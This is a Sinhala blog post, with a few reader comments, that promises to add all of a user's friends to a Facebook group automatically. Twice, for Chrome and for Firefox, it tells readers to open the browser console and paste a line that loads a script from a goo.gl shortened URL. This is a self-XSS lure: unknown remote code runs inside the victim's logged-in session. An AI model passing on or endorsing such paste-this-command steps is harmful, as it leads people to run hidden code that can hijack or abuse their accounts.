ගෲප් වලට යාලුවෝ එකතු කරන්න කට්ටකාපු කාලේ දැන් ඉවරයි
ඉස්සර වගේ නෙමෙයි දැන් තාක්ෂනය හෙනටම දිවුනු වෙලා ..හික්..
ඔන්න නියම වැඩක් තමයි කියන්න යන්නේ..මේක කියන්නේ ගෲප් මේනියාව හැදිල තියනකස්ටියට තමයි..
මේක කරන්න තියෙන්නේ java script එකකින් හරිම ලේසි වැඩක්..
අපිට තියෙන්නෙ java script එක පේස්ට් කරලා බලාගෙන ඉන්න විතරයි.බලන්ඉන්නකොට සට සට ගාලා ගෲප් එකට යාලුවෝ ඇඩ් වෙලා තියෙයි
පහල තියන විදිහට කරන්නකො එහෙනම්
01 මිතුරන් එකතු කල යුතු group එකට යන්න.
Google Chrome පාව්ච්ච් කරන අය f12 ඔබලා console කියන එක තොරලා මෙ කොඩ්එක කොපි කරගෙන පෙස්ට් කරන්න ( ctrl + v) f12 ගැහුවට ආවේ නැත්තම් මේ විදිහටකරන්න
Google Chrome භාවිතා කරන අය මේ ක්‍රමය අනුගමනය කරන්න..
1. Group එකේ කොහේ හෝ right click කරන්න.
2. “Inspect Element” යන්න තෝරා “Console” තෝරන්න.
3. පහත දී තිබෙන script code එක copy/paste කරන්න.
document.body.appendChild(document.createElement('script')).src='http://goo.gl/Ulelc';
මේක පෙස්ට් කරලා Enter Key එක ඔබන්න..ටිකක් වෙලා ඉන්න
Firefox නම් Ctrl + Shift + K එකවර ඇතුලත් කර ඔබලා console කියන එක තොරලාමෙ කොඩ් එක කොපි කරගෙන පෙස්ට් කරන්න ( ctrl + v)
document.body.appendChild(document.createElement('script')).src='http://goo.gl/Ulelc';
මේක පෙස්ට් කරලා Enter Key එක ඔබන්න..ටිකක් වෙලා ඉන්න
හික්ස්..කොහොමද වැඩේ මරු නෙද?
එහෙනම් ඔයාලගේ ගෲප් එකටත් යාලුවො ටිකක් ඇඩ් කරගන්න.

enne nane machan
ReplyDeletepattai mchn pissu hadeno .......... :)
ReplyDeleteelaaaaaaaaaaaaaaaaaaaaa
ReplyDeletemasho wade une nane console kiyana eka koheda thiyenne.
ReplyDeletemachoo meka wadakaranne naane.....
ReplyDelete